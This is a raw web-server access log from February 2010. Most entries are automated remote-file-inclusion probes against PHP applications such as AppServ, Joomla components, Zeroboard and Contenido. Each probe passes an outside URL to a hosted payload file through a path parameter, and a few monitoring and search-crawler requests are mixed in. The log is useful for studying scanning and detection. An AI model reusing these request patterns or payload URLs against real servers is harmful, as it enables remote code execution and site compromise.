165.132.30.11 - - [23/Feb/2010:03:28:45 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:28:45 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:28:54 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:28:54 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:28:54 -0500] "GET /logs/error_log.Q109071100/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:29:09 -0500] "GET /logs/error_log.Q109071100/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:29:09 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:29:09 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.117.2.17 - - [23/Feb/2010:03:30:31 -0500] "GET /logs/access_log.Q109112700%20%20//skin/uks_vote_v3021/setup.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.254.172.27 - - [23/Feb/2010:03:30:49 -0500] "GET /http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
88.255.116.109 - - [23/Feb/2010:03:30:50 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:30:55 -0500] "GET /logs/error_log.Q109071100/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:30:55 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:31:40 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:31:40 -0500] "GET /logs/access_log.Q109071100/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:31:40 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:31:42 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:31:46 -0500] "GET /logs/access_log.Q109071100/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:31:47 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:03:31:50 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.255.116.109 - - [23/Feb/2010:03:32:00 -0500] "GET /logs/access_log.Q109112900/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:32:00 -0500] "GET /logs/access_log.Q109112900/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:32:50 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:32:50 -0500] "GET /logs/access_log.Q109071100%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:32:50 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:32:59 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:32:59 -0500] "GET /logs/access_log.Q109071100%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:32:59 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
121.254.172.27 - - [23/Feb/2010:03:33:01 -0500] "GET /logs/access_log.Q110021000/http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
121.254.172.27 - - [23/Feb/2010:03:33:02 -0500] "GET /http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
121.254.172.27 - - [23/Feb/2010:03:33:02 -0500] "GET /logs/http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
189.108.172.26 - - [23/Feb/2010:03:33:08 -0500] "GET //bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:33:24 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:33:24 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:33:24 -0500] "GET /logs/error_log.Q109071100/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:33:26 -0500] "GET /logs/access_log.Q109112900%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:33:35 -0500] "GET /logs/access_log.Q109112900%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.117.2.17 - - [23/Feb/2010:03:33:57 -0500] "GET /logs/access_log.Q109102900//skin/dognara_gallery/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.117.2.17 - - [23/Feb/2010:03:33:57 -0500] "GET //skin/dognara_gallery/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.117.2.17 - - [23/Feb/2010:03:33:57 -0500] "GET /logs//skin/dognara_gallery/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.195.115.186 - - [23/Feb/2010:03:34:44 -0500] "GET /logs/error_log.Q109073000 HTTP/1.0" 200 2505495 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
165.132.30.11 - - [23/Feb/2010:03:35:32 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:35:32 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:35:32 -0500] "GET /logs/access_log.Q109080900%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
75.119.216.146 - - [23/Feb/2010:03:35:51 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
75.119.216.146 - - [23/Feb/2010:03:35:51 -0500] "GET /logs/access_log.Q109060100//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
75.119.216.146 - - [23/Feb/2010:03:35:51 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
75.119.216.146 - - [23/Feb/2010:03:35:59 -0500] "GET /logs/access_log.Q110020900//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
211.100.61.81 - - [23/Feb/2010:03:36:41 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www1.mycarsoul.com//extend/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.100.61.81 - - [23/Feb/2010:03:36:41 -0500] "GET /logs/access_log.Q109060300//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www1.mycarsoul.com//extend/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.100.61.81 - - [23/Feb/2010:03:36:41 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www1.mycarsoul.com//extend/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:36:41 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:36:41 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:36:41 -0500] "GET /logs/access_log.Q109110800/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:36:51 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:36:52 -0500] "GET /logs/error_log.Q109080900%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:36:52 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:36:52 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:36:52 -0500] "GET /logs/access_log.Q109110800/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:36:53 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:36:53 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:36:53 -0500] "GET /logs/error_log.Q109080900%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:36:56 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.100.61.81 - - [23/Feb/2010:03:37:09 -0500] "GET /logs/access_log.Q109060300//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www1.mycarsoul.com//extend/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.100.61.81 - - [23/Feb/2010:03:37:10 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www1.mycarsoul.com//extend/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.100.61.81 - - [23/Feb/2010:03:37:10 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www1.mycarsoul.com//extend/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:37:20 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:37:20 -0500] "GET /logs/access_log.Q109080900%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:37:20 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:37:26 -0500] "GET /logs/access_log.Q109080900%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:37:28 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:37:28 -0500] "GET /logs/access_log.Q109071100%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:37:28 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:37:30 -0500] "GET /logs/access_log.Q109080900%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:37:38 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:37:38 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:37:38 -0500] "GET /logs/access_log.Q109071100%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
78.110.50.120 - - [23/Feb/2010:03:37:39 -0500] "GET /logs/access_log.Q109060100//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 269 "-" "libwww-perl/5.831"
78.110.50.120 - - [23/Feb/2010:03:37:39 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 242 "-" "libwww-perl/5.831"
78.110.50.120 - - [23/Feb/2010:03:37:39 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 247 "-" "libwww-perl/5.831"
78.110.50.120 - - [23/Feb/2010:03:37:39 -0500] "GET /logs/access_log.Q110020900//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 269 "-" "libwww-perl/5.831"
165.132.30.11 - - [23/Feb/2010:03:38:24 -0500] "GET /logs/access_log.Q109112900%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:38:25 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:38:30 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:38:30 -0500] "GET /logs/error_log.Q109080900/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:38:35 -0500] "GET /logs/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:38:35 -0500] "GET /logs/error_log.Q109080900/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:38:37 -0500] "GET /logs/access_log.Q109080900/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:38:40 -0500] "GET /////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:03:38:40 -0500] "GET /logs/access_log.Q109112900%20%20/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:03:38:45 -0500] "GET /logs/access_log.Q109080900/////appserv/main.php?appserv_root=http://www.ktacademy.co.kr///lib/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:03:38:58 -0500] "GET //?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:03:38:58 -0500] "GET /logs/access_log.Q109100300//?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:03:39:02 -0500] "GET /logs//?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 200 39479 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:03:39:37 -0500] "GET //?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:03:39:37 -0500] "GET /logs/access_log.Q109100300//?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:03:39:37 -0500] "GET /logs//?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 200 39479 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:03:39:49 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.150.205.155 - - [23/Feb/2010:03:41:18 -0500] "GET /logs/access_log.Q109090200//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
219.150.205.156 - - [23/Feb/2010:03:41:19 -0500] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
219.150.205.155 - - [23/Feb/2010:03:41:25 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 271 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
117.74.98.18 - - [23/Feb/2010:03:41:42 -0500] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:03:41:48 -0500] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.100.61.81 - - [23/Feb/2010:03:42:21 -0500] "GET /logs/access_log.Q109060300%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www1.mycarsoul.com//extend/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
219.150.205.156 - - [23/Feb/2010:03:42:32 -0500] "GET /logs/error_log.Q109090200//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
211.100.61.81 - - [23/Feb/2010:03:43:00 -0500] "GET /logs/access_log.Q109060300%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www1.mycarsoul.com//extend/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:03:43:03 -0500] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:03:43:03 -0500] "GET //?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:03:43:03 -0500] "GET /logs//?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 200 39479 "-" "Mozilla/5.0"
219.150.205.156 - - [23/Feb/2010:03:43:24 -0500] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
219.150.205.156 - - [23/Feb/2010:03:43:24 -0500] "GET /logs/error_log.Q109090200//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
219.150.205.155 - - [23/Feb/2010:03:43:26 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 271 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
121.254.172.27 - - [23/Feb/2010:03:43:28 -0500] "GET /logs/access_log.Q109062700/http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
219.150.205.156 - - [23/Feb/2010:03:44:20 -0500] "GET /logs/access_log.Q109090200//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
89.36.175.10 - - [23/Feb/2010:03:44:22 -0500] "GET //?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:03:44:22 -0500] "GET /logs/access_log.Q109063000//?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:03:44:22 -0500] "GET /logs//?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 200 39479 "-" "Mozilla/5.0"
67.195.115.186 - - [23/Feb/2010:03:45:48 -0500] "GET /logs/error_log.Q109093000 HTTP/1.0" 200 3571351 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.93.147.154 - - [23/Feb/2010:03:46:25 -0500] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:03:46:25 -0500] "GET //?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:03:46:25 -0500] "GET /logs//?_zb_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 200 39479 "-" "Mozilla/5.0"
211.100.61.81 - - [23/Feb/2010:03:46:27 -0500] "GET /logs/access_log.Q109101100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www1.mycarsoul.com//extend/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.100.61.81 - - [23/Feb/2010:03:46:30 -0500] "GET /logs/access_log.Q109101100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www1.mycarsoul.com//extend/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.249.71.219 - - [23/Feb/2010:03:46:32 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011AFD5955813600ABBB05E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.230.162.220 - - [23/Feb/2010:03:47:36 -0500] "GET /logs//contenido/cronjobs/cronjobs.php.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:03:47:36 -0500] "GET /logs/access_log.Q109111700%20%20//contenido/cronjobs/cronjobs.php.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:03:47:36 -0500] "GET //contenido/cronjobs/cronjobs.php.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:03:47:39 -0500] "GET /logs//contenido/cronjobs/cronjobs.php.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:03:47:39 -0500] "GET /logs/access_log.Q109111700%20%20//contenido/cronjobs/cronjobs.php.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:03:47:39 -0500] "GET //contenido/cronjobs/cronjobs.php.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
